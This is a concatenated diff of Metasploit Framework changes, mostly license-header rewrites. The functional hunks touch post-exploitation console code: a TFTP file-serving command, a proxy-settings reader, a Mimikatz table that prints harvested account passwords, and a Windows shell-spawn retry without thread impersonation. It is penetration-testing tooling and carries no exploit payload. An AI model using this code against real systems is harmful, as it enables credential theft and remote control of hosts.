+    print("tftp_add_file <file> [-h]\n\n" +
+          "Add a file to the currently running TFTP server.\n" +
+          @@tftp_add_file_opts.usage + "\n")
+  end
+
+  def cmd_tftp_add_file(*args)
+    @@tftp_add_file_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_tftp_add_file_usage
+        return true
+      end
+    }
+
+    name = args.shift
+
+    print_status( "Adding file #{name} ..." )
+    client.lanattacks.tftp.add_file(name, ::File.read(name))
+    print_good( "File added." )
+  end
+
+end
+
+end
+end
+end
+end
+
@@ -106,7 +106,7 @@ class Console::CommandDispatcher::Mimikatz
    )

    accounts.each do |acc|
-      table << [acc[:authid], acc[:package], acc[:domain], acc[:user],  acc[:password]]
+      table << [acc[:authid], acc[:package], acc[:domain], acc[:user], (acc[:password] || "").gsub("\n","")]
    end

    print_line table.to_s
@@ -62,6 +62,7 @@ class Console::CommandDispatcher::Stdapi::Net
      "portfwd"  => "Forward a local port to a remote service",
      "arp"      => "Display the host ARP cache",
      "netstat"  => "Display the network connections",
+      "getproxy" => "Display the current proxy configuration",
    }
    reqs = {
      "ipconfig" => [ "stdapi_net_config_get_interfaces" ],
@@ -78,6 +79,7 @@ class Console::CommandDispatcher::Stdapi::Net
      "portfwd"  => [ ],
      "arp"      => [ "stdapi_net_config_get_arp_table" ],
      "netstat"  => [ "stdapi_net_config_get_netstat" ],
+      "getproxy" => [ "stdapi_net_config_get_proxy" ],
    }

    all.delete_if do |cmd, desc|
@@ -414,6 +416,14 @@ class Console::CommandDispatcher::Stdapi::Net
    print @@portfwd_opts.usage
  end

+  def cmd_getproxy
+    p = client.net.config.get_proxy_config()
+    print_line( "Auto-detect     : #{p[:autodetect] ? "Yes" : "No"}" )
+    print_line( "Auto config URL : #{p[:autoconfigurl]}" )
+    print_line( "Proxy URL       : #{p[:proxy]}" )
+    print_line( "Proxy Bypass    : #{p[:proxybypass]}" )
+  end
+
 protected

  #
@@ -236,7 +236,15 @@ class Console::CommandDispatcher::Stdapi::Sys
    when /win/
      path = client.fs.file.expand_path("%COMSPEC%")
      path = (path and not path.empty?) ? path : "cmd.exe"
-      cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+
+      # attempt the shell with thread impersonation
+      begin
+        cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+      rescue
+        # if this fails, then we attempt without impersonation
+        print_error( "Failed to spawn shell with thread impersonation. Retrying without it." )
+        cmd_execute("-f", path, "-c", "-H", "-i")
+      end
    when /linux/
      # Don't expand_path() this because it's literal anyway
      path = "/bin/sh"
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##


@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##


@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##


@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##


@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'
@@ -34,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
        [
          [ 'CVE', '2011-0923' ],
          [ 'OSVDB', '72526' ],
-          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-055/' ],
+          [ 'ZDI', '11-055' ],
          [ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
          [ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
        ],
--- a/Show More
+++ b/Show More